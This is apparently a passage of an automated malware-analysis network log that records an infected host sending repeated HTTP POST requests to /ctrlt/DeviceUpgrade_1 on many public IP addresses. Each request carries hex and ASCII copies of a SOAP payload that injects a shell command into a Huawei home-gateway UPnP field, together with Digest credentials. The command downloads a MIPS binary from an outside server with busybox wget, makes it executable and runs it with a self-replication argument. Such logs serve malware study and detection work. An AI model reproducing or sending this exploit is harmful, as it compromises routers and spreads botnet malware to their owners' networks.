                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3260192.168.2.234723241.245.176.15437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.678829908 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3261192.168.2.2345028197.188.52.8437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.682847023 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3262192.168.2.236073641.3.28.7037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.682863951 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3263192.168.2.2344590197.136.162.8737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.682874918 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3264192.168.2.234583686.5.74.8137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.683047056 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3265192.168.2.2358542197.30.41.537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.683157921 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3266192.168.2.2346912157.188.142.22637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.683195114 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3267192.168.2.2338838157.26.210.9037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.684144974 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3268192.168.2.233488241.213.187.15237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.684159040 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3269192.168.2.234093441.250.136.12537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.684207916 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
